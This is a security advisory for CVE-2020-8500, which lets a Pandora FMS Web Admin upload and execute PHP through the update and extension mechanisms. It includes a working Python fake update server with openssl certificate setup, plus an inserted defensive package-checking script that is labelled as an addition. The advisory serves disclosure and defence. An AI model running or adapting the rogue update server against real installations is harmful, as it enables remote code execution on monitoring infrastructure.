PHP file upload and remote code execution in Pandora FMS <= 7.42 (Extension,Online/Offline Update) (CVE-2020-8500)
In Pandora FMS 7.42 and below it is possible to upload PHP files via the Extension Uploader and via the Online Updater. The enterprise edition offers the Offline Updater as a feature; with the offline updater exactly the same is possible.
What is a Web Admin allowed to do, and what not?
It is not allowed to upload a PHP file even with an Admin account, because it is dangerous. (Vendor)
Key Topics
- The packages are not signed; there are no certificates in use.
- There are no checksums in use.
- The Update Manager URL can be changed via the web application. (I think this parameter should be set during install and stored in a config file.)
- The dangerous PHP functions are allowed here, because it is a monitoring system.
- What about man-in-the-middle attacks?
- The uploaded files are accessible without authentication.
- Directory listing
I know a button on a webpage is comfortable, but security starts where comfort ends. What is good for a WordPress site may not be good for a monitoring system.
Technical Details
Note: The vulnerabilities are exploitable only with a Web Admin account.
1. Online Updater
The online updater is a simple thing. The update package is a plain ".oum" file (Online Update Manager). This file is a zip archive, which can contain PHP files.
The Update Manager URL can be configured (Update Manager -> Update Manager Options). This URL works only with https!
Generating PEM files (self-signed certificate and key for the fake server)
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
Fake Pandora FMS Update Manager (run it with python3 ./fake_pandorafms_https_server)
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import ssl


class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    # GET: Pandora FMS downloads the package it was told about; serve the .oum zip.
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/zip')
        self.end_headers()
        with open('./k44.oum', 'rb') as f:
            self.wfile.write(f.read())

    # POST: the update check; answer with a fake version and the package URL.
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        self.rfile.read(content_length)  # consume the request body
        self.send_response(200)
        self.end_headers()
        self.wfile.write(json.dumps([{
            'version': 'k4m1ll0_fake_version',
            'file_name': 'https://192.168.0.103:2000/k44.oum'
        }], ensure_ascii=False).encode())


httpd = HTTPServer(('0.0.0.0', 2000), SimpleHTTPRequestHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='cert.pem', keyfile='key.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
Preparing the update package
Configuring the URL to use my fake server
Checking updates
Install the Fake Update
Install - Success
Proof
Demo Video
Note: The installed files are accessible without authentication.
2. Extension Upload
admin tools->extension manager->extension uploader
- The vendor does not want to allow us to upload PHP files, even with an Admin account.
- They allow uploading extensions, and extensions are zipped PHP files.
- The extracted PHP files are accessible from outside without authentication.
Upload the "extension", which contains the file "k44_extension.php"
The extracted file is accessible without authentication.
Proof
Demo Video
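A defender-side check for the two gaps the Key Topics list and the extension uploader demonstrate (an unverified package, and a zip that carries PHP), as an added example that is not part of the original advisory or of Pandora FMS: it pins the archive digest to a value known out-of-band (a stand-in for real package signing) and rejects archives containing server-side code or entries that escape the extraction directory. The suffix list, the sample archives and the function names are constructed for this example.

```python
import hashlib
import io
import posixpath
import zipfile

# Suffixes that must never be accepted inside an update or extension archive
# (constructed list for this example; tune it to the deployment).
FORBIDDEN_SUFFIXES = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_update_package(data: bytes, expected_sha256: str) -> list:
    """Return the reasons the package must be rejected (empty list = accept).

    Two checks the affected updater does not perform:
    1. the archive digest must match a value pinned out-of-band, so a swapped
       or MitM-served .oum/extension zip fails before anything is extracted;
    2. no entry may be server-side code or escape the extraction directory.
    """
    problems = []
    actual = sha256_hex(data)
    if actual != expected_sha256.lower():
        problems.append(f"digest mismatch: expected {expected_sha256}, got {actual}")
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return problems + ["not a zip archive"]
    for info in archive.infolist():
        name = info.filename
        normalized = posixpath.normpath(name)
        if name.startswith("/") or normalized.startswith("..") or "\\" in name:
            problems.append(f"path escapes extraction dir: {name}")
        if name.lower().endswith(FORBIDDEN_SUFFIXES):
            problems.append(f"server-side code in package: {name}")
    return problems


def build_package(files: dict) -> bytes:
    """Build an in-memory zip (constructed sample data for the example)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, content in files.items():
            archive.writestr(name, content)
    return buf.getvalue()
```

A package that only ships data files and matches its pinned digest returns an empty list; one that contains a PHP file, or whose digest differs from the pinned value, returns one reason per finding.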
3. Offline Updater
The offline updater works the same way as the online updater; the only difference is how the package is uploaded. The offline updater is an Enterprise feature now, but earlier it was part of the community edition. I performed the demo with the old version:
I used the same oum file.
Upload
Update
Proof
Demo Video
© 2019-2024 Kamilló Matek (k4m1ll0) All Rights Reserved